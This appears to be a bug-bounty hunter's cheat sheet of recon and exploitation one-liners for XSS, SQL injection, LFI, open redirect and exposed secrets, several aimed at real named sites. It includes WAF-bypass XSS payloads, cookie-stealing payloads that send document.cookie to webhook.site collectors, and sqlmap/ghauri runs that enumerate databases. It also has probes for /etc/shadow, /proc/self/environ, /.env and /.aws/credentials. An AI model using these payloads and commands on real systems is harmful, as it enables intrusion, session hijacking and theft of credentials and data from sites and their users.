My Concept

Find Broken Access Control

  1. Numbers of Web Assets in scope.

  2. Filter with httpx.

  3. After filtering, select an unauthenticated web application.

  4. Fuzzing Directories with FFUF.

  5. Most of the results are 302 redirects.

  6. Run FFUF again with a size filter.

  7. Only a few results come back.

  8. One of the results is a 302 redirect to /directory; opening it leads to /directory/v1/endpoint.svc

  9. Use the Wsdler Burp extension to enumerate the endpoints.

  10. Multiple endpoints execute successfully without authorization, i.e. the service applies no authentication or authorization check to those operations.

✅ Use the -fs filter in FFUF to exclude responses with the same size, making it easier to spot unique and interesting findings.

Find and Exploit CVE :

Search CVE
vulnx search drupal
vulnx search "Drupal 11.1.3"
vulnx search "Drupal 11.1.3" --detailed
Search CVE Detail
vulnx id CVE-2023-28432
Search CVE Template
https://cloud.projectdiscovery.io/library/CVE-2024-12356

Find XSS

1
Nuclei
cat endpoints.txt | uro | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
2
xoxo Method
cat xss-ready.txt | uro | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
3
httpx + Gxss + Kxss = Coffin Method
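# Keep only parameterised URLs whose response Content-Type is a markup type,
# strip the bracketed content-type column that httpx-toolkit -ct appends, and
# pipe the remaining URLs through Gxss and kxss.
# Fix: in an ERE a bare "+" is a quantifier, so "xhtml+xml" and "svg+xml" never
# matched the literal Content-Type values; the "+" is now escaped. The duplicate
# "application/xml" alternative is dropped.
grep '=' endpoints.txt \
  | uro \
  | httpx-toolkit -ct -silent -nc \
  | grep -i -E 'text/html|application/xhtml\+xml|application/xml|text/xml|image/svg\+xml|application/html' \
  | cut -d '[' -f 1 \
  | Gxss \
  | kxss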
Friend Method
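# Collect archived and crawled URLs for every host in livesubdomains.txt, keep
# the ones that carry a query parameter, and run the reflected-XSS DAST template
# over the ones that still respond.
# Fix: the static-asset filter was ".(jpg|...|js|...)" with an unescaped dot and
# no anchor, so it discarded every URL that contained e.g. "js" or "pdf" after
# any character at all (all *.jsp and *.json URLs included). The extension is
# now matched literally at the end of the path, and egrep is replaced by grep -E.
waybackurls < livesubdomains.txt | anew wayback.txt \
  && katana -u livesubdomains.txt -jc 3 -d 5 -o katana.txt \
  && gau < livesubdomains.txt | anew gau.txt \
  && urlfinder -list livesubdomains.txt -o urlfinder.txt \
  && sort -u wayback.txt katana.txt gau.txt urlfinder.txt | anew allurls.txt \
  && grep -Eiv '\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt|eot|ttf)([?#]|$)' allurls.txt \
       | anew filter_urls_1.txt \
  && grep -e "=" filter_urls_1.txt | anew param_1.txt \
  && p1radup -i param_1.txt -o param_2.txt \
  && httpx < param_2.txt | anew live_parameters.txt \
  && nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single < live_parameters.txt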
4
Bruteforce Method - Find Hidden Endpoints and the Parameters
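# Fingerprint every live host once and print the result grouped by technology.
# Fix: the original probed each host five times and chained the greps with
# "&&", so the first technology without a match (grep exit status 1) skipped
# all the remaining ones. One httpx run is saved to a temporary file and then
# filtered per technology; the file is removed afterwards.
tech_report=$(mktemp) && {
  httpx -title -sc -td -server -location < livesubdomains.txt > "$tech_report"
  grep PHP "$tech_report"
  grep -i ASP "$tech_report"
  grep Java "$tech_report"
  grep CFML "$tech_report"
  grep Perl "$tech_report"
  rm -f -- "$tech_report"
}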
5
Extracts links and Paths
curl -s https://www.pcmmod.com/js/utils/web_calls.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
6
Find Hidden endpoints in JS Files for Bruteforce Parameters
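# Select the JavaScript files from endpoints.txt, save them to jsfiles.txt, then
# feed the list to jsecret and (for the URLs answering 200) to JSA's jsa.py.
# Fix: "js$" also matched any URL that merely ends in the letters "js"; the
# pattern now requires a literal ".js" extension.
grep '\.js$' endpoints.txt | tee jsfiles.txt \
  && jsecret < jsfiles.txt \
  && httpx -mc 200 < jsfiles.txt | python3 /home/kali/tools/JSA/jsa.py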
7
Find Hidden endpoints in robots.txt for Bruteforce Parameters
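# Fetch robots.txt from every live host and turn each Disallow entry into a full
# URL appended (de-duplicated by anew) to robot-words.txt.
# Fixes:
#  - "sed 's#//#/#g'" ran over the whole URL and so rewrote "https://" to
#    "https:/"; slash collapsing is now applied to the path part only.
#  - "for url in $(cat ...)" word-split and glob-expanded the URLs, and "read"
#    without -r mangled backslashes; both loops now use "IFS= read -r".
httpx-toolkit -l livesubdomains.txt -path /robots.txt -silent -o robots-url.txt \
  && while IFS= read -r url; do
       base=${url%/robots.txt}
       curl -s -- "$url" \
         | grep -i 'Disallow' \
         | awk '{print $2}' \
         | sed -e 's#^/*##' -e 's#//*#/#g' \
         | while IFS= read -r rel; do
             printf '%s/%s\n' "${base%/}" "$rel" | anew robot-words.txt
           done
     done < robots-url.txt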
8
FUZZ Restricted Domains
cat livesubdomains.txt | httpx -mc 403 -title -sc -td -server -location && cat livesubdomains.txt | httpx -mc 401 -title -sc -td -server -location
9
Arjun
grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 -silent  | tee fuzz.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i fuzz.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single && echo -e "${PURPLE}Filtering Ext-Endpoint for Find Hidden Parameters with Arjun..." && grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" endpoints.txt | tee arjun-raw-endpoints.txt && echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with Arjun..." && uro < arjun-raw-endpoints.txt | httpx -mc 200 | tee arjun_ext-endpoints.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i arjun_ext-endpoints.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
10
x8
echo -e "${PURPLE}Filtering Ext-Endpoint for Hidden Parameters with x8..." && grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" endpoints.txt | tee x8-raw-endpoints.txt && echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with x8..." && cat x8-raw-endpoints.txt | uro | httpx -mc 200 -silent | tee x8_ext-endpoints.txt && echo -e "Running x8 to find Ext-Endpoints for Hidden Parameters..." && x8 -u x8_ext-endpoints.txt -w /parameters.txt -X GET -o x8.txt && cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee x8-xss.txt && cat x8-xss.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
11
site:.who.int inurl:? | inurl:&

12

Exploit & Bypass XSS

GET Method - URL with 1 parameter
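# The KNOXSS API key is read from the KNOXSS_API_KEY environment variable rather
# than being written into the command; ${VAR:?} aborts the command when it is
# unset. A key that has been pasted into notes should be rotated.
curl https://api.knoxss.pro -d 'target=https://videohub.sbb.ch/esearch/search?keyword=asad' -H "X-API-KEY: ${KNOXSS_API_KEY:?set KNOXSS_API_KEY}"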
GET Method - URL with 2+ parameters => %26 between Parameters
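# API key comes from the KNOXSS_API_KEY environment variable instead of a
# literal in the command; ${VAR:?} aborts the command when it is unset.
curl https://api.knoxss.pro -d 'target=http://www.unesco.org/archives/multimedia/index.php?page=2%26pg=34%26pattern%26video=video' -H "X-API-KEY: ${KNOXSS_API_KEY:?set KNOXSS_API_KEY}"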
Authenticated GET Method - with Cookies
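# API key comes from the KNOXSS_API_KEY environment variable instead of a
# literal in the command; ${VAR:?} aborts the command when it is unset.
# The "&auth=" part is a separate POST field, which is why it is not %26-encoded.
curl https://api.knoxss.pro -d 'target=https://x55.is/brutelogic/session/index.php?name=guest&auth=Cookie:PHPSESSID=9p77u90dssmkmn3kgmmgq3b5d3' -H "X-API-KEY: ${KNOXSS_API_KEY:?set KNOXSS_API_KEY}"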
13

Find Open Redirect

webhook
cat endpoints.txt | grep '='  | qsreplace https://webhook.site/de8aa6b8-5a22-43f2-b38c-0aa12e7f722a > ssrf.txt && cat ssrf.txt | httpx -fr && split -l 10 ssrf.txt output_file_prefix
14
Nuclei
cat endpoints.txt | nuclei -dast -t /home/kali/nucli/open-redirect.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
15
Generic
cat livesubdomains.txt | nuclei -t /home/kali/nucli/swagger/open-redirect-generic.yaml
16
Google Dork
site:.*.com inurl:"=https" 
site:*.pk inurl:"redirectURL="
17

Find Secrets and Endpoints in JS files

cat endpoints.txt | grep -E "\.js$" | urldedupe | httpx -silent | tee js_files.txt
cat js_files.txt | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
cat js_files.txt | nuclei -t exposures/ --s info,high,critical,medium -es unknown -c 30
18

Extract Endpoints and Secrets

cat livesubdomains.txt | while read host; do for path in /config.js /.aws/credentials /admin/config.json /config.json /app/config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json /google-services.json /package.json /package-lock.json /composer.json /pom.xml /docker-compose.yml; do echo "$host$path"; done; done | httpx -mc 200 -sc -cl -title
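# Select the JavaScript files from katana.txt, save them to jsfiles.txt, then
# feed the list to jsecret and (for the URLs answering 200) to JSA's jsa.py.
# Fix: "js$" also matched any URL that merely ends in the letters "js"; the
# pattern now requires a literal ".js" extension.
grep '\.js$' katana.txt | tee jsfiles.txt \
  && jsecret < jsfiles.txt \
  && httpx -mc 200 < jsfiles.txt | python3 /home/kali/tools/JSA/jsa.py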
19

Misconfiguration checks

nuclei -tags misconfig -l katana.txt -rl 75 -es low,info -ss host-spray -H "Cookie: auth=123" -H "User-Agent: ..."
20

Check Improper Access Control

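# Run a one-minute, status-200-only content discovery pass against every host
# listed in livesubdomains.txt.
# Fix: the -x line ended in "\ " (backslash followed by a space). That escapes
# the space instead of the newline, so the command ended there and the "-w ..."
# line was executed as a separate command; the wordlist, target URL, thread
# count and both limits never reached feroxbuster.
# Note: -k turns off TLS certificate validation for these requests.
while IFS= read -r host; do
  feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -W 0 \
    -x js,php,html,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl \
    -w /raft-small-directories.txt -u "$host/" -t 10 --rate-limit 1000 --time-limit 1m
done < livesubdomains.txt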
# Same content discovery pass as a loop over livesubdomains.txt, with each line
# normalised before it is used as the target URL.
while IFS= read -r host; do
  # Cut the line at its first whitespace character (anything after it, a
  # trailing CR included, is discarded), then drop one trailing slash.
  host=${host%%[[:space:]]*}
  host=${host%/}
  # Remove any carriage return that is still present.
  host=${host//$'\r'/}
  # Blank lines produce an empty host; skip them.
  [[ -n "$host" ]] || continue
  feroxbuster \
    -s 200 -k --random-agent --no-state --dont-extract-links -W 0 \
    -x js,php,html,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl \
    -w /home/kali/common.txt \
    -u "$host" \
    -t 10 --rate-limit 1000 --time-limit 1m
done < livesubdomains.txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://api.hoteltonight-test.com/FUZZ -mc 200 -H "Content-Type: application/json"
  • dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.example.com -e js,svc,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pml,pl --full-url --max-rate=5 -i 200
  • feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,phtml,inc,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pml,pl -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50
  • ffuf -u https://www.kfc.co.uk/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -recursion -recursion-depth 4 -mc 200 -e .js,.svc,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.pml,.action,.act,.pl -rate 50 -t 50200
  • Run Fuzzing with feroxbuster

  • Extract Domains

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 | tee fuzz.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i fuzz.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' katana.txt | sort -u | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u | httpx -mc 200 | tee fuzz.txt
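# Fingerprint every live host once and print the result grouped by technology.
# Fix: the original probed each host five times and chained the greps with
# "&&", so the first technology without a match (grep exit status 1) skipped
# all the remaining ones. One httpx run is saved to a temporary file and then
# filtered per technology; the file is removed afterwards.
tech_report=$(mktemp) && {
  httpx -title -sc -td -server -location < livesubdomains.txt > "$tech_report"
  grep PHP "$tech_report"
  grep -i ASP "$tech_report"
  grep Java "$tech_report"
  grep CFML "$tech_report"
  grep Perl "$tech_report"
  rm -f -- "$tech_report"
}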
PHP
feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,phtml,inc,html,xhtm,htm,htn -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50
ASP.NET
feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,html,xhtm,htm,htn,asp,aspx,ashx,asmx -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50
JAVA
feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,html,xhtm,htm,htn,jsp,jspx,jsf,jspa,do,action,act,pml -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50
  • Run Arjun On All Endpoints

arjun -i endpoints.txt -oT arjun.txt && cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a check.txt 
  • Run x8 On All Endpoints with Assetnote parameters wordlist

x8 -u endpoints.txt -w /parameters.txt -X GET -o x8.txt && cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a check.txt
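# For every URL in check.txt, replace the parameter values with a marker string
# and with /etc/passwd and report when the marker, or "root:x", appears in the
# response body.
# Fix: the URL used to be substituted into the text of the sh -c script
# (x="%"), so quotes, backticks or $(...) inside a URL taken from crawled data
# were executed by the local shell. The URL is now passed as the positional
# argument $1 and never parsed as code. "echo -e" is replaced by printf because
# sh is not guaranteed to support -e.
xargs -I '{}' -P 25 sh -c '
  x=$1
  xu=$(printf "%s\n" "$x" | qsreplace "REFLECTED")
  lu=$(printf "%s\n" "$x" | qsreplace "/etc/passwd")
  if curl -s -- "$xu" | grep -q "REFLECTED"; then
    printf "\033[1;32m[+] XSS Possible\033[0m: %s\n" "$xu"
  fi
  if curl -s -- "$lu" | grep -q "root:x"; then
    printf "\033[1;31m[+] LFI Possible\033[0m: %s\n" "$lu"
  fi
' _ '{}' < check.txt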
cat check.txt | while read -r u; do f=$(curl -sL -o /dev/null -w "%{url_effective}" "$(echo "$u" | qsreplace 'https://evil.com')"); if [[ "$f" == "https://evil.com"* ]]; then echo -e "Original: $u\nFinal: \033[1;31m$f\033[0m\nStatus: \033[1;32mVULNERABLE\033[0m\n"; else echo -e "Original: $u\nFinal: $f\nStatus: \033[1;33mNOT VULNERABLE\033[0m\n"; fi; done
cat check.txt | Gxss -p '">asad<hacked' && cat check.txt | Gxss | httpx -sc && cat check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee confirm-html-injection.txt
cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
cat check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txt && cat confirm-xss.txt | qsreplace '"><Img Src=OnXSS OnError=(alert)(origin)>'
➡️ RXSS CloudFlare
\">K='><Svg/OnLoad=(confirm)(origin)>
'"/><Img Src=OnXSS OnError=(alert)(1)>
'"/><SVG/oNlY=1 ONlOAD=confirm(document.domain)>

➡️ DOM CloudFlare
'-alert?.(1)-' 
')[alert][0].call(this,document["cookie"])//
javascript://target.com/%E2%80%A8alert(1)
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin)

➡️ CMD CloudFlare
cat /e${hahaha}tc/${heywaf}pas${catchthis}swd

➡️ Imperva
'"><Image Src=//X55.is OnLoad%0C=import(Src)//

➡️ Akamai
'"><A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1)>
cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc
ffuf -u "FUZZ/asad/..CFIDE/administrator/index.cfm" -w livesubdomains.txt -c -v
  • https://xss.report/dashboard (credentials redacted)

  • https://bxsshunter.com/dashboard (credentials redacted)

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>
cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/sqli/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1"
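# Run ghauri against every URL in check.txt; "yes n" supplies "n" on its stdin.
# Fix: read now uses IFS= and -r so backslashes and leading/trailing blanks in a
# URL reach the tool unchanged.
while IFS= read -r url; do
    printf 'Testing URL: %s\n' "$url"
    yes n | ghauri -u "$url" --dbs --batch --banner --current-db --level 3
done < check.txt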


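# Run sqlmap against every URL in check.txt; "yes n" supplies "n" on its stdin.
# Fix: read now uses IFS= and -r so backslashes and leading/trailing blanks in a
# URL reach the tool unchanged.
while IFS= read -r url; do
    printf 'Testing URL: %s\n' "$url"
    yes n | sqlmap -u "$url" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment
done < check.txt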
Manual Confirm
'||1==1--+-
"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
cat check.txt | gf sqli > check-sql.txt; sqlmap -m check-sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a confirm-sqli.txt
ghauri -u https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1 --random-agent -v3 --level=3 risk=3
cat check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -location -fr -mr "evil.com"
cat check.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -location -fr -mr "evil.com"
cat check.txt | qsreplace "///evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

Check with wordlist

cat check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location
cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/lfi/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single
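# Stage 1: blank every parameter value in check.txt, request each base URL with
# the paths from /lfi.txt, and keep the first response per URL that matches the
# passwd-style root entry (written to lfi_hits.txt).
# Stage 2: re-request each hit with curl and record the ones that still match
# in confirmed_lfi.txt.
# Fix: each URL used to be substituted into the text of the sh -c script
# ('echo {} | ...'), so shell metacharacters in a URL taken from crawled data
# were interpreted by the local shell. The URL is now handed over as "$1".
sed 's/=.*/=/' check.txt \
  | xargs -P 20 -I '{}' sh -c '
      printf "%s\n" "$1" \
        | httpx-toolkit -paths /lfi.txt -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:" -silent \
        | head -n 1
    ' _ '{}' > lfi_hits.txt \
  && while read -r url; do
       printf '%s ... ' "$url"
       if curl -s -k --max-time 10 -- "$url" | grep -q "root:[x*$][^:]*:0:0:"; then
         printf '\033[1;32mCONFIRMED\033[0m\n'
         printf '%s\n' "$url" >> confirmed_lfi.txt
       else
         printf '\033[1;31mFAILED\033[0m\n'
       fi
     done < lfi_hits.txt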

Check All Paths

while read -r url; do for path in "/etc/passwd" "/etc/shadow" "/etc/shells" "/etc/group" "/etc/profile" "/etc/hosts" "/proc/self/environ" "/proc/self/status" "/proc/mounts" "/proc/version" "/bin/sh"; do modified_url="${url/\/etc\/passwd/$path}"; echo -n "$modified_url ... "; response=$(curl -s -k --max-time 10 "$modified_url"); if [[ "$path" == "/etc/passwd" ]] && echo "$response" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/etc/shadow" ]] && echo "$response" | grep -q "root:\$[0-9]\$[a-zA-Z0-9]"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/proc/self/environ" ]] && echo "$response" | grep -q "USER=\|PATH="; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif echo "$response" | grep -q "Permission denied\|No such file\|Forbidden\|Error"; then echo -e "\033[1;33mBLOCKED\033[0m"; else echo -e "\033[1;31mSAFE\033[0m"; fi; done; done < lfi_hits.txt
echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
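# Build a FUZZ template from the URL and run ffuf with the /lfi.txt wordlist,
# matching responses that contain a passwd-style root entry.
# Fix: $urls was unquoted, so a URL containing "?" or "*" was subject to
# pathname expansion and word splitting before ffuf saw it; read now uses
# IFS= and -r so the line is taken verbatim.
echo "http://testphp.vulnweb.com/showimage.php?file=" \
  | sed 's/=.*/=/' \
  | qsreplace "FUZZ" \
  | sort -u \
  | while IFS= read -r urls; do
      ffuf -u "$urls" -w /lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -v
    done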
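# Fix: the URL was substituted into the sh -c script text ("%"), so shell
# metacharacters in it were interpreted by the local shell; it is now passed as
# the positional argument $1.
echo "https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=2" \
  | qsreplace "/etc/passwd" \
  | xargs -I '{}' -P 25 sh -c 'curl -s -- "$1" 2>&1 | grep -q "root:x" && echo "VULN! $1"' _ '{}'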
